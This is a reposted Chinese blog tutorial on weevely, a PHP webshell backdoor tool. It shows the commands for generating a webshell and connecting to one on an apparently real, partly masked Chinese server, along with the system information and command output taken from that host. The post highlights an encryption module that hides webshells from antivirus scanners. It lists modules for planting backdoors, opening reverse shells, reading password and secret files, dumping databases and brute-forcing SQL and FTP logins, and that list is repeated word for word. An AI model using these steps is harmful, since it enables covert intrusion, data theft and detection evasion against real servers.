weevely-------linux中的菜刀(转载)
weevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
// 生成一个密码为 ices 的php webshell.
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices
// ./weevely.py http://*.com/webshell.php [password] 连接
apache@HQEBWEBJ:/app/ecccs/web/common$ :system.info
// 按两下 tab键,进入操控模式,例如输入 system.info 获得系统信息
whoami: apache
hostname: HQEBWEBJ
basedir: /app/ecccs/web/common
uname: Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux
os: Linux
document_root: /home/ecccs/web
safe_mode: 0
script: /common/gen.php
client_ip: 120.3*.56.156
max_execution_time: 30
php_self: /common/gen.php
apache@HQEBWEBJ:/app/ecccs/web/common$ cat /etc/issue
Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel
// 执行一般的命令
加密功能
冷冷的夜提取了weevely的php加密模块 (其实这才是本文的亮点,用来免杀webshell)
$ python test.py 原.php 密.php
如下图,加密后的php一句话webshell代码中,只出现了str_replace这个熟知的函数,未出现其他关键字,这要查杀是非常难滴。
功能模块
系统 system.info //收集系统信息 文件 file.read //读文件 file.upload //上传本地文件 file.check //检查文件的权限和 file.enum //在本地词表的书面枚举远程文件 file.download //下载远程二进制/ ASCII文件到本地 SQL sql.query //执行SQL查询 sql.console //启动SQL控制台 sql.dump //获取SQL数据库转储 sql.summary //获取SQL数据库中的表和列 后门 backdoor.tcp //TCP端口后门 backdoor.install //安装后门 backdoor.reverse_tcp //反弹 枚举 audit.user_files //在用户家中列举常见的机密文件 audit.user_web_files //列举常见的Web文件 audit.etc_passwd //枚举/etc/passwd 查找 find.webdir //查找可写的web目录 find.perm //查找权限可读/写/可执行文件和目录 find.name //按名称查找文件和目录 find.suidsgid //查找SUID / SGID文件和目录 暴破 bruteforce.sql //暴力破解单一SQL用户 bruteforce.sql_users //暴力破解SQL密码 bruteforce.ftp // 暴力破解单一FTP用户 bruteforce.ftp_users //暴力破解FTP密码 系统 system.info //收集系统信息 文件 file.read //读文件 file.upload //上传本地文件 file.check //检查文件的权限和 file.enum //在本地词表的书面枚举远程文件 file.download //下载远程二进制/ ASCII文件到本地 SQL sql.query //执行SQL查询 sql.console //启动SQL控制台 sql.dump //获取SQL数据库转储 sql.summary //获取SQL数据库中的表和列 后门 backdoor.tcp //TCP端口后门 backdoor.install //安装后门 backdoor.reverse_tcp //反弹 枚举 audit.user_files //在用户家中列举常见的机密文件 audit.user_web_files //列举常见的Web文件 audit.etc_passwd //枚举/etc/passwd 查找 find.webdir //查找可写的web目录 find.perm //查找权限可读/写/可执行文件和目录 find.name //按名称查找文件和目录 find.suidsgid //查找SUID / SGID文件和目录 暴破 bruteforce.sql //暴力破解单一SQL用户 bruteforce.sql_users //暴力破解SQL密码 bruteforce.ftp // 暴力破解单一FTP用户 bruteforce.ftp_users //暴力破解FTP密码
转载于:https://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.html
weevely-------linux中的菜刀(转载)相关推荐
- Weevely——Linux中的菜刀
Weevely(Linux中的菜刀) 转载自:https://blog.csdn.net/qq_45521281/article/details/106587791 目录 Weevely(Linux中 ...
- Weevely(Linux中的菜刀)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 文章目录 基本用法 后门生成 连接后门 weevely模块 几个模块的使 ...
- 用linux如何用vi编写c程序,linux中VI编写C程序。。。
在linux中编写C程序时不像编写shell那样开头要#!/bin/bash,但是在C程序中要指定头文件(头文件是指输入输出,宏等,而且要首先声明,也是必须要开始就声明的) 写好C代码后要给C文件赋予 ...
- Linux中date命令的各种实用方法--转载
在linux环境中,不管是编程还是其他维护,时间是必不可少的,也经常会用到时间的运算,自己也曾经为时间的各种表示方法和如何修改时间而困惑,熟练运用date命令来表示自己想要表示的时间,肯定可以给自己的 ...
- Linux中 /boot 目录介绍 【转载】
Linux中 /boot 目录介绍 转自:点击打开链接 一./boot/目录中的文件和目录 Linux系统在本地启动时,目录/boot/非常重要,其中的文件和目录有: (1)系统Kernel的配置文件 ...
- (转载)深入理解Linux中内存管理---分段与分页简介
首先,必须要阐述一下这篇文章的主题是Linux内存管理中的分段和分页技术. 来回顾一下历史,在早期的计算机中,程序是直接运行在物理内存上的.换句话说,就是程序在运行的过程中访问的都是物理地址.如果这个 ...
- linux中vi编辑器(转载)
三种模式相互切换 在命令终端输入vi进入vi编辑器. 命令模式:进入编辑器即进入命令模式, 输入模式:在命令模式下输入"i "进入输入模式: 末行模式:按":" ...
- linux中搜索文件内容关键字--转载哈
linux中搜索文件内容关键字 度娘了下,想找的答案就是这个,发现一堆xxxx的回答,在此记录下,方便以后查阅.谢谢 linux系统里的VI是编辑文本的命令,在vi里查找相应关键字的方法为: /关键字 ...
- 转载:解决wps linux中字体缺失以及文字体名字全是英文的问题
第一部分:字体缺失问题 可能是版权原因,Linux中许多字体是没有的,可以从Windows系统的Windows\Fonts文件夹中,复制所需的ttf字体文件到Linux系统的/usr/share/Fo ...
最新文章
- 信息与计算机科学考研学校排名,计算机科学与技术考研学校排名
- 微软Office Online服务安装部署及wopi代码实现--------Office Online服务器的安装
- mysql union all 别名_mysql union和union all
- Linux运维基础命令笔试题
- sql 读取本地txt文件批量插入数据库
- Redis面试必看40题
- 斐波那契数列基本性质
- PS入门(1-7) HSB色彩模式
- 乌尔都语简介和Unicode由来
- 用户行为分析——AARRR 模型 和RARRA模型
- 阿里云服务器被恶意ddos攻击了怎么办?
- (转)DCB文件格式解析
- 分辨率,定位精度,重复定位精度解释
- 微信公众号免扫码登录的方法
- int a是神么意思
- python图像处理---python的图像处理模块Image
- 一分钟理解 HTTPS 到底解决了什么问题
- 清华大学 计算机技术 非全日制,2018年清华大学计算机系计算机技术考研(085211)考试科目、参考书目、复习经验---新祥旭考研...
- RESTful接口架构是什么
- ElGamal加密算法简介
热门文章
- JZOJ 5938. 【NOIP2018模拟10.30】分离计划
- java join使用实例_Java多线程中关于join方法的使用实例解析
- androidstudio sqlite where 条件_SQL 面试题:WHERE 和 HAVING、ON 有什么区别?
- sas table将缺失值计入百分比_SAS:通过数据块填充缺失值
- iframe如何发送请求_插件分享 | 如何半天玩转一个“ES未授权利用”插件
- Qt5 中 关于Widget Mapper的简单应用
- [codevs 1302] 小矮人(2002年CEOI中欧信息学奥赛)
- uvalive5992(搜索)
- 分数线划定pascal程序
- wordpress插件翻译不生效_新的恶意软件利用wordpress插件漏洞攻击数百万网站